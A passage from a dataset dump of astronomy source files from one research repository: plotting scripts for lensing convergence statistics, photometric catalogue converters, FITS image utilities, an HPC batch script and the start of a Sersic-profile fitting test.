'$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[2])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[2])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.05])\n#ax.set_ylabel('$\\sigma_\\kappa$')\nax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects3[0], rects4[0]), ('45 23 gal+1/r+', '120 23 gal+1/r+'), bbox_to_anchor=(0.6, 0.5), fontsize=10)\nplt.subplots_adjust(left=0.1, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\n#plt.savefig('%skappahistbar_noshear.png' % root, dpi=250)\nplt.savefig('%skappabiashistbar_noshear.png' % root, dpi=250)\n\nax = plt.subplot(2,1,1)\n\ncol5 = (kappastat_45[1])\nrects5 = ax.bar(ind + width, col5, width, color='r')\ncol6 = (kappastat_120[1])\nrects6 = ax.bar(ind + 2*width, col6, width, 
color='b')\n\n#ax.set_ylim([0.0,0.2])\nax.set_ylim([-0.1,0.1])\n#ax.set_ylabel('median$_\\kappa$')\nax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol7 = (kappastat_45[3])\nrects7 = ax.bar(ind + width, col7, width, color='r')\ncol8 = (kappastat_120[3])\nrects8 = ax.bar(ind + 2*width, col8, width, color='b')\n\nax.set_ylim([0,0.1])\n#ax.set_ylabel('$\\sigma_\\kappa$')\nax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects7[0], rects8[0]), ('45 23 gal+1/r+$\\gamma$+', '120 23 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.6, 0.3), fontsize=10)\nplt.subplots_adjust(left=0.1, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\n#plt.savefig('%skappahistbar_shear.png' % root, dpi=250)\nplt.savefig('%skappabiashistbar_shear.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.6883561611175537, "alphanum_fraction": 0.7465753555297852, "avg_line_length": 31.44444465637207, "blob_id": "782368b2cfb39f275efda854fb39755ade71529c", "content_id": "b749ebe4e6792dfedb4dff05ecfcf5562a089980", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 292, "license_type": "no_license", "max_line_length": 56, "num_lines": 9, "path": "/python/image_utilities/mask_repairwht.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open(\"ch2_4amin_rms.fits\")\nimagem = fits.open(\"ch2_4amin_nolens.fits\")\nimage[0].data[imagem[0].data == 0] = 10000000\nimage.writeto(\"ch2_4amin_nolens_rms.fits\",clobber=True)\n" }, { "alpha_fraction": 0.6275303363800049, "alphanum_fraction": 0.6639676094055176, "avg_line_length": 13.529411315917969, "blob_id": "f71eb2574b8184b2cb713a7728e4c0ca8412b765", "content_id": "0fb2442a53d9b762bab22df4bba66279b2b15281", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 36, "num_lines": 17, "path": "/python/scripts/NAOJ/batch3_ascii.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb3.out\n#PBS -e Logb3.err\n#PBS -N 3\n#PBS -l mem=40gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython ascii_to_fits3.py\n" }, { "alpha_fraction": 0.40746986865997314, "alphanum_fraction": 0.5401204824447632, "avg_line_length": 58.69784164428711, "blob_id": 
"3800617db260fbb0c7de6e943833d9dcec8cc0e5", "content_id": "b835abe53379f44756b66ef00c548b15076a773d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8300, "license_type": "no_license", "max_line_length": 229, "num_lines": 139, "path": "/python/catalogue_utilities/scriptABtoJkyEAzY_ugrizYJHK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert a photometric catalogue in the format expected by BPZ to the format expected by EaZy. The code handles non-detections (not yet non-exposures).\n##########################\n\nimport numpy as np\n\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\nfile = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\n\n# zeropoint corrections suggested by BPZ:\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nK_corr = +0.06\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94 # computed by LePhare\nH_corr += 1.35\nK_corr += 1.83\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nY = 11\nY_err = 12\nJ = 13\nJ_err = 14\nH = 15\nH_err = 16\nK = 17\nK_err = 18\n\ndata = np.loadtxt(file,unpack=True)\n\n# apply the corrections\ndata[u][np.abs(data[u]) != 99.0] += u_corr\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[z][np.abs(data[z]) != 99.0] += z_corr\ndata[Y][np.abs(data[Y]) != 99.0] += Y_corr\ndata[J][np.abs(data[J]) != 99.0] += J_corr\ndata[H][np.abs(data[H]) != 99.0] += H_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# make non-detection fluxes -99\ndata[u][np.abs(data[u]) == 99.0] = -99\ndata[g][np.abs(data[g]) == 99.0] = -99\ndata[r][np.abs(data[r]) == 99.0] = -99\ndata[i][np.abs(data[i]) == 99.0] = -99\ndata[z][np.abs(data[z]) == 99.0] = -99\ndata[Y][np.abs(data[Y]) == 99.0] = -99\ndata[J][np.abs(data[J]) == 99.0] = -99\ndata[H][np.abs(data[H]) == 99.0] = -99\ndata[K][np.abs(data[K]) == 99.0] = -99\n\n# for the non-detections, replace error bars with the flux corresponsing to the corrected limiting mag\ndata[u_err][np.abs(data[u]) == 99.0] = 3631000000 * 10**(-(data[u_err][np.abs(data[u]) == 99.0] + u_corr)/2.5)\ndata[g_err][np.abs(data[g]) == 99.0] = 3631000000 * 10**(-(data[g_err][np.abs(data[g]) == 99.0] + g_corr)/2.5)\ndata[r_err][np.abs(data[r]) == 99.0] = 3631000000 * 10**(-(data[r_err][np.abs(data[r]) == 99.0] + r_corr)/2.5)\ndata[i_err][np.abs(data[i]) == 99.0] = 3631000000 * 10**(-(data[i_err][np.abs(data[i]) == 99.0] + i_corr)/2.5)\ndata[z_err][np.abs(data[z]) == 99.0] = 3631000000 * 10**(-(data[z_err][np.abs(data[z]) == 99.0] + z_corr)/2.5)\ndata[Y_err][np.abs(data[Y]) == 99.0] = 3631000000 * 10**(-(data[Y_err][np.abs(data[Y]) == 99.0] + Y_corr)/2.5)\ndata[J_err][np.abs(data[J]) == 99.0] = 3631000000 * 10**(-(data[J_err][np.abs(data[J]) == 99.0] + J_corr)/2.5)\ndata[H_err][np.abs(data[H]) == 99.0] = 3631000000 * 10**(-(data[H_err][np.abs(data[H]) == 99.0] + H_corr)/2.5)\ndata[K_err][np.abs(data[K]) == 99.0] = 3631000000 * 10**(-(data[K_err][np.abs(data[K]) == 99.0] + K_corr)/2.5)\n\n# make minimum delta mag 0.01\ndata[u_err][(np.abs(data[u]) != 99.0) & (np.abs(data[u_err]) == 0.00)] = 0.01\ndata[g_err][(np.abs(data[g]) != 99.0) & (np.abs(data[g_err]) == 0.00)] = 
\n# make minimum delta mag 0.01\ndata[u_err][(np.abs(data[u]) != 99.0) & (np.abs(data[u_err]) == 0.00)] = 0.01\ndata[g_err][(np.abs(data[g]) != 99.0) & (np.abs(data[g_err]) == 0.00)] = 0.01\ndata[r_err][(np.abs(data[r]) != 99.0) & (np.abs(data[r_err]) == 0.00)] = 0.01\ndata[i_err][(np.abs(data[i]) != 99.0) & (np.abs(data[i_err]) == 0.00)] = 0.01\ndata[z_err][(np.abs(data[z]) != 99.0) & (np.abs(data[z_err]) == 0.00)] = 0.01\ndata[Y_err][(np.abs(data[Y]) != 99.0) & (np.abs(data[Y_err]) == 0.00)] = 0.01\ndata[J_err][(np.abs(data[J]) != 99.0) & (np.abs(data[J_err]) == 0.00)] = 0.01\ndata[H_err][(np.abs(data[H]) != 99.0) & (np.abs(data[H_err]) == 0.00)] = 0.01\ndata[K_err][(np.abs(data[K]) != 99.0) & (np.abs(data[K_err]) == 0.00)] = 0.01\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\ndata[u_err][np.abs(data[u_err]) == 99.00] = 1.00\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[z_err][np.abs(data[z_err]) == 99.00] = 1.00\ndata[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\ndata[J_err][np.abs(data[J_err]) == 99.00] = 1.00\ndata[H_err][np.abs(data[H_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# convert AB mag -> flux (microJy)\nx=data[u][np.abs(data[u]) != 99.0]\ny=data[u_err][np.abs(data[u]) != 99.0]\ndata[u_err][np.abs(data[u]) != 99.0] = 3631000000 * (10**(-(data[u][np.abs(data[u]) != 99.0] - data[u_err][np.abs(data[u]) != 99.0])/2.5) - 10**(-(data[u][np.abs(data[u]) != 99.0] + data[u_err][np.abs(data[u]) != 99.0])/2.5)) / 2\ndata[u][np.abs(data[u]) != 99.0] = 3631000000 * 10**(-data[u][np.abs(data[u]) != 99.0]/2.5)\ndata[g_err][np.abs(data[g]) != 99.0] = 3631000000 * (10**(-(data[g][np.abs(data[g]) != 99.0] - data[g_err][np.abs(data[g]) != 99.0])/2.5) - 10**(-(data[g][np.abs(data[g]) != 99.0] + data[g_err][np.abs(data[g]) != 99.0])/2.5)) / 2\ndata[g][np.abs(data[g]) != 99.0] = 3631000000 * 10**(-data[g][np.abs(data[g]) != 99.0]/2.5)\ndata[r_err][np.abs(data[r]) != 99.0] = 3631000000 * (10**(-(data[r][np.abs(data[r]) != 99.0] - data[r_err][np.abs(data[r]) != 99.0])/2.5) - 10**(-(data[r][np.abs(data[r]) != 99.0] + data[r_err][np.abs(data[r]) != 99.0])/2.5)) / 2\ndata[r][np.abs(data[r]) != 99.0] = 3631000000 * 10**(-data[r][np.abs(data[r]) != 99.0]/2.5)\ndata[i_err][np.abs(data[i]) != 99.0] = 3631000000 * (10**(-(data[i][np.abs(data[i]) != 99.0] - data[i_err][np.abs(data[i]) != 99.0])/2.5) - 10**(-(data[i][np.abs(data[i]) != 99.0] + data[i_err][np.abs(data[i]) != 99.0])/2.5)) / 2\ndata[i][np.abs(data[i]) != 99.0] = 3631000000 * 10**(-data[i][np.abs(data[i]) != 99.0]/2.5)\ndata[z_err][np.abs(data[z]) != 99.0] = 3631000000 * (10**(-(data[z][np.abs(data[z]) != 99.0] - data[z_err][np.abs(data[z]) != 99.0])/2.5) - 10**(-(data[z][np.abs(data[z]) != 99.0] + data[z_err][np.abs(data[z]) != 99.0])/2.5)) / 2\ndata[z][np.abs(data[z]) != 99.0] = 3631000000 * 10**(-data[z][np.abs(data[z]) != 99.0]/2.5)\ndata[Y_err][np.abs(data[Y]) != 99.0] = 3631000000 * (10**(-(data[Y][np.abs(data[Y]) != 99.0] - data[Y_err][np.abs(data[Y]) != 99.0])/2.5) - 10**(-(data[Y][np.abs(data[Y]) != 99.0] + data[Y_err][np.abs(data[Y]) != 99.0])/2.5)) / 2\ndata[Y][np.abs(data[Y]) != 99.0] = 3631000000 * 10**(-data[Y][np.abs(data[Y]) != 99.0]/2.5)\ndata[J_err][np.abs(data[J]) != 99.0] = 3631000000 * (10**(-(data[J][np.abs(data[J]) != 99.0] - data[J_err][np.abs(data[J]) != 99.0])/2.5) - 10**(-(data[J][np.abs(data[J]) != 99.0] + data[J_err][np.abs(data[J]) != 99.0])/2.5)) / 2\ndata[J][np.abs(data[J]) != 99.0] = 
3631000000 * 10**(-data[J][np.abs(data[J]) != 99.0]/2.5)\ndata[H_err][np.abs(data[H]) != 99.0] = 3631000000 * (10**(-(data[H][np.abs(data[H]) != 99.0] - data[H_err][np.abs(data[H]) != 99.0])/2.5) - 10**(-(data[H][np.abs(data[H]) != 99.0] + data[H_err][np.abs(data[H]) != 99.0])/2.5)) / 2\ndata[H][np.abs(data[H]) != 99.0] = 3631000000 * 10**(-data[H][np.abs(data[H]) != 99.0]/2.5)\ndata[K_err][np.abs(data[K]) != 99.0] = 3631000000 * (10**(-(data[K][np.abs(data[K]) != 99.0] - data[K_err][np.abs(data[K]) != 99.0])/2.5) - 10**(-(data[K][np.abs(data[K]) != 99.0] + data[K_err][np.abs(data[K]) != 99.0])/2.5)) / 2\ndata[K][np.abs(data[K]) != 99.0] = 3631000000 * 10**(-data[K][np.abs(data[K]) != 99.0]/2.5)\n\n \n# 146 u_DEC: 200\n# 147 g_DEC: 300\n# 148 r_DEC: 300\n# 149 i_DEC: 600\n# 150 z_DEC: 400\n# 151 Y_DEC: 200\n# 152 J_HAWKI: 150 AB-Vega= 1.06\n# 153 H_HAWKI: 220 AB-Vega= 1.34\n# 154 Ks_HAWKI: 300 AB-Vega= 1.78\n \nfileout = file[:-11] + \"_forEazy.cat\"\nstr = \"id F146 E146 F147 E147 F148 E148 F149 E149 F150 E150 F151 E151 F152 E152 F153 E153 F154 E154\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f')\n\n\n" }, { "alpha_fraction": 0.553084671497345, "alphanum_fraction": 0.576757550239563, "avg_line_length": 37.19178009033203, "blob_id": "8a552c9a0cb05f80c5eac3dea9ecb4ee645349b2", "content_id": "b7403547af59e229abc84f7066eb50b36cc2b81e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 216, "num_lines": 73, "path": "/python/image_utilities/HSClistforcutoutsS17AJames.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a catalogue of RA and DEC, produces the input lists for DAS Cutout and for the PSF cutout\n# run as python HSClistforcutouts.py /Volumes/LaCieSubaru/Gaia/James/SecrestHSC5arcsecS17A.fits # before running I crossmatched the catalogue with itself to check that there are no multiple detections inside 5 arcsec\n\nimport os\nimport sys\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\ncat = str(sys.argv[1])\ns = cat.split('/')[:-1]\npath = ''\nfor i in range(len(s)):\n path = path + s[i] + '/'\n\nif \".fits\" in cat:\n from astropy.table import Table\n t = Table.read(cat)\n coord = np.c_[t['ra'],t['dec']].T\nelse:\n ra = 4\n dec = 6\n coord = np.loadtxt(cat,usecols=[ra,dec],unpack=True)\nhead = '#? rerun filter ra dec sw sh # column descriptor\\n'\nheadpsf = '#? 
ra dec filter type rerun centered\\n'\nrerun = 's18a_wide'\nfilters = ['HSC-G','HSC-R','HSC-I','HSC-Z','HSC-Y']\nfilterspsf = ['g','r','i','z','y']\nsw = '3.5asec'\nsh = '3.5asec'\ndescriptor = '#'\n\nlen1 = np.shape(coord[0])[0] * len(filters) / 1000\nlen2 = np.shape(coord[0])[0] * len(filters) % 1000\nif len2 > 0: len1 +=1\nlen3 = np.shape(coord[0])[0] * len(filters) / len1\nlen4 = np.shape(coord[0])[0] * len(filters) % len1\nlen4 = len3 + len4\n\nfout = []\nfoutpsf = []\nfor i in range(len1):\n fout.append(path + cat.split('/')[-1][:-5] + '_cutout' + str(i) +'.cat')\n foutpsf.append(path + cat.split('/')[-1][:-5] + '_psfcutout' + str(i) +'.cat')\n os.system(\"rm -f %s\" % fout[i])\n os.system(\"rm -f %s\" % foutpsf[i])\n\nstrcoord = []\nstrcoordpsf = []\nfor i in range(np.shape(coord[0])[0]):\n x = SkyCoord(np.float(coord[0][i]), np.float(coord[1][i]), unit='deg')\n strcoord.append('{0} {1}'.format(x.ra.to_string(unit=u.hourangle, sep=':', precision=2, pad=True), x.dec.to_string(sep=':', precision=2, alwayssign=True, pad=True)))\n strcoordpsf.append('{0} {1}'.format(x.ra.deg, x.dec.deg))\n\n\npos = 0\nfor i in range(len1):\n f = open(fout[i],'a')\n g = open(foutpsf[i],'a')\n f.write(head)\n g.write(headpsf)\n if i == 0:\n for j in range(len4):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n g.write(strcoordpsf[pos / len(filters)] + ' ' + filterspsf[pos % len(filters)] + ' coadd ' + rerun + ' true \\n')\n pos += 1\n if i != 0:\n for j in range(len3):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n g.write(strcoordpsf[pos / len(filters)] + ' ' + filterspsf[pos % len(filters)] + ' coadd ' + rerun + ' true \\n')\n pos += 1\n f.close()\n g.close()\n" }, { "alpha_fraction": 0.5955399870872498, "alphanum_fraction": 0.652383029460907, "avg_line_length": 43.843135833740234, "blob_id": "62dba80cd991a87f1addff1c863f62a42879a695", "content_id": "2d103d391f77a6af7530f48a557d7d60584ba055", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2287, "license_type": "no_license", "max_line_length": 151, "num_lines": 51, "path": "/python/catalogue_utilities/inferkappa_forChihFan.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu July 9 2018\n# kappagammaforChihFan.py should be run first to get the files kappagamma_values_GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f.dat etc.\n# I am not correcting for bias by dividing by the number of lines of sight inside subintervals because the shears from Ken are very narrow\n\nimport numpy as np\nimport time\n\nstart_time=time.time()\n\n#models = ['noshear','powNFWG1G2','powNFWG1','powNFW','compNFW','powSISG1']\n#shear = [0,0.047,0.038,0.041,0.050,0.011]\n#shearerr = [10,0.0062,0.0095,0.0099,0.0075,0.0070]\n#models = ['powSISG1']\n#shear = [0.011]\n#shearerr = [0.0070]\n\nroot = \"/lfs08/rusucs/kappaplanes/\"\n\nprint \"Reading...\"\n\nfor j in range(8):\n for i in range(8):\n print j,i\n #kappa_,gamma_ = np.loadtxt(\"%skappagamma_values_GGL_los_8_%s_%s_N_4096_ang_4_rays_to_plane_34_f.dat\" % (root,str(j),str(i)), unpack=True)\n kappa_ = np.loadtxt(\"%skappagamma_values_GGL_los_8_%s_%s_N_4096_ang_4_rays_to_plane_34_f.dat\" % (root,str(j),str(i)), usecols=[0], unpack=True)\n if i == 0 and j == 0:\n kappa = kappa_\n #gamma = gamma_\n else:\n kappa = np.append(kappa,kappa_)\n #gamma = 
np.append(gamma,gamma_)\n\nbin_stat = 3000\nmin_kappa = -0.50\nmax_kappa = 1\n\n#for i in range(len(models)):\n# output = '%skappagamma_values_GGL_los_8_N_4096_ang_4_rays_to_plane_34_f_%s.dat' % (root,models[i])\n# kappafinal = kappa[(gamma > shear[i] - shearerr[i]) & (gamma < shear[i] + shearerr[i])]\n# kappahist = np.histogram(kappafinal, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float)\n# kappaindex = np.histogram(kappafinal, bins = bin_stat, range=(min_kappa,max_kappa))[1].astype(float)\n# np.savetxt(output,np.c_[kappaindex[:-1],kappahist],fmt='%s',delimiter='\\t',newline='\\n',header=\"%s\" % len(kappafinal))\n\noutput = '%skappagamma_values_GGL_los_8_N_4096_ang_4_rays_to_plane_34_f_kappahist.dat' % root\nkappahist = np.histogram(kappa, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float)\nkappaindex = np.histogram(kappa, bins = bin_stat, range=(min_kappa,max_kappa))[1].astype(float)\nnp.savetxt(output,np.c_[kappaindex[:-1],kappahist],fmt='%s',delimiter='\\t',newline='\\n',header=\"%s\" % len(kappa))\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.4410039186477661, "alphanum_fraction": 0.6082138419151306, "avg_line_length": 42.81428527832031, "blob_id": "960d4cca67f27868b3dcf38b05cd95f8c14c96fd", "content_id": "b92b5727e6baba3c264c6809754f8cf3db294f54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3068, "license_type": "no_license", "max_line_length": 171, "num_lines": 70, "path": "/python/catalogue_utilities/convertIRACfluxestoAB.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Takes outputs from Tphot/Tfit and converts them to Lephare-expected input\n##########################\n\n\nimport numpy as np \n\nfile1 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch1_4amin_nolens_SingleFit_1/ch1_ir_tphot.cat_pass2_best\"\nfile2 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch2_4amin_nolens_SingleFit_1/ch2_ir_tphot.cat_pass2_best\"\nfile3 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch3_4amin_nolens_SingleFit_1/ch3_ir_tphot.cat_pass2_best\"\nfile4 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch4_4amin_nolens_SingleFit_1/ch4_ir_tphot.cat_pass2_best\"\n\ndata1 = np.loadtxt(file1,usecols=(1,2,7,8),unpack=True)\ndata2 = np.loadtxt(file2,usecols=(7,8),unpack=True)\ndata3 = np.loadtxt(file3,usecols=(7,8),unpack=True)\ndata4 = np.loadtxt(file4,usecols=(7,8),unpack=True)\n\ntemperrfunc1 = 0.23\ntemperrfunc2 = 0.27\ntemperrfunc3 = 0.30\ntemperrfunc4 = 0.35\n\nx = data1[0] * 3.0\ny = data1[1] * 3.0\n\nch1 = data1[2]\nch1err = data1[3]\nch1[(ch1 < 0) | (ch1 - ch1err <= 0)] = -99.0\nch1err[ch1 < 0] = -99.0\nch1err[ch1 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch1[ch1 > 0]-ch1err[ch1 > 0]) - (21.58 - 2.5 * np.log10(ch1[ch1 > 0]+ch1err[ch1 > 0]))) / 2.0) ** 2 + temperrfunc1 ** 2)\nch1[ch1 > 0] = 21.58 - 2.5 * np.log10(ch1[ch1 > 0])\nch1[ch1err >= 1] = -99.0 # 1 sigma detection\nch1err[ch1err >= 1] = -99.0\n#ch1err[ch1 > 0] = 21.58 - 2.5 * np.log10(ch1[ch1 > 0]-ch1err[ch1 > 0]) - (21.58 - 2.5 * np.log10(ch1[ch1 > 0]+ch1err[ch1 > 0])) / 2.0\n#ch1err[ch1 > 0] = 21.58 - 2.5 * np.log10(ch1[ch1 > 0]-ch1err[ch1 > 0])\n#print ch1[ch1 > 0]\n#print ch1err[ch1 > 0]\n\nch2 = data2[0]\nch2err = data2[1]\nch2[(ch2 < 0) | (ch2 - ch2err <= 0)] = -99.0\nch2err[ch2 < 0] = -99.0\nch2err[ch2 > 0] = np.sqrt(((21.58 - 2.5 * 
np.log10(ch2[ch2 > 0]-ch2err[ch2 > 0]) - (21.58 - 2.5 * np.log10(ch2[ch2 > 0]+ch2err[ch2 > 0]))) / 2.0) ** 2 + temperrfunc2 ** 2)\nch2[ch2 > 0] = 21.58 - 2.5 * np.log10(ch2[ch2 > 0])\nch2[ch2err >= 1] = -99.0\nch2err[ch2err >= 1] = -99.0\n\nch3 = data3[0]\nch3err = data3[1]\nch3[(ch3 < 0) | (ch3 - ch3err <= 0)] = -99.0\nch3err[ch3 < 0] = -99.0\nch3err[ch3 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch3[ch3 > 0]-ch3err[ch3 > 0]) - (21.58 - 2.5 * np.log10(ch3[ch3 > 0]+ch3err[ch3 > 0]))) / 2.0) ** 2 + temperrfunc3 ** 2)\nch3[ch3 > 0] = 21.58 - 2.5 * np.log10(ch3[ch3 > 0])\nch3[ch3err >= 1] = -99.0\nch3err[ch3err >= 1] = -99.0\n\nch4 = data4[0]\nch4err = data4[1]\nch4[(ch4 < 0) | (ch4 - ch4err <= 0)] = -99.0\nch4err[ch4 < 0] = -99.0\nch4err[ch4 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch4[ch4 > 0]-ch4err[ch4 > 0]) - (21.58 - 2.5 * np.log10(ch4[ch4 > 0]+ch4err[ch4 > 0]))) / 2.0) ** 2 + temperrfunc4 ** 2)\nch4[ch4 > 0] = 21.58 - 2.5 * np.log10(ch4[ch4 > 0])\nch4[ch4err >= 1] = -99.0\nch4err[ch4err >= 1] = -99.0\n\n\nfileout = \"IRAC.cat\"\nstr = \"x y ch1 ch1err ch2 ch2err ch3 ch3err ch4 ch4err\"\ndataout = np.c_[x,y,ch1,ch1err,ch2,ch2err,ch3,ch3err,ch4,ch4err]\nnp.savetxt(fileout,dataout,header=str,fmt='%.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\n" }, { "alpha_fraction": 0.6389994025230408, "alphanum_fraction": 0.691401481628418, "avg_line_length": 48.51515197753906, "blob_id": "1995f4f47f30296a0c751329ab0994976db9fa45", "content_id": "b0b7d32cc8a3af69f9e26e7578c5af86c79ac8a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13072, "license_type": "no_license", "max_line_length": 425, "num_lines": 264, "path": "/python/modeling_utilities/fitting_test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Tools for simulating a Sersic profile, convolving it with the PSF, optimizing it and computing parameter uncertainties with emcee\n\nimport numpy as np\nimport time\n\nfrom astropy.io import fits\npixels = 100\n# create a blank image\nimg = np.zeros([pixels,pixels])\nhdu = fits.PrimaryHDU(img)\nhdu.writeto('new.fits',clobber=True)\n\n# create a fits file with a Sersic\nfrom astropy.modeling.models import Sersic2D\nfrom astropy.convolution import convolve, convolve_fft, Gaussian2DKernel\nsers = Sersic2D(amplitude = 100, r_eff = 10, n=1, x_0=50, y_0=50, ellip=.5, theta=-1)\n# amplitude = Central surface brightness, within r_eff\nx,y = np.meshgrid(np.arange(pixels), np.arange(pixels))\nimg = sers(x,y)\nhdu = fits.PrimaryHDU(img)\nhdu.writeto('new.fits',clobber=True)\n\n# add noise to the model\noriginalsky = 20\nnoise = np.random.poisson(img + originalsky)\nnoise_forsigma = np.random.poisson(img + originalsky) # I don't want to use the created noise as a noise estimate because that would produce an 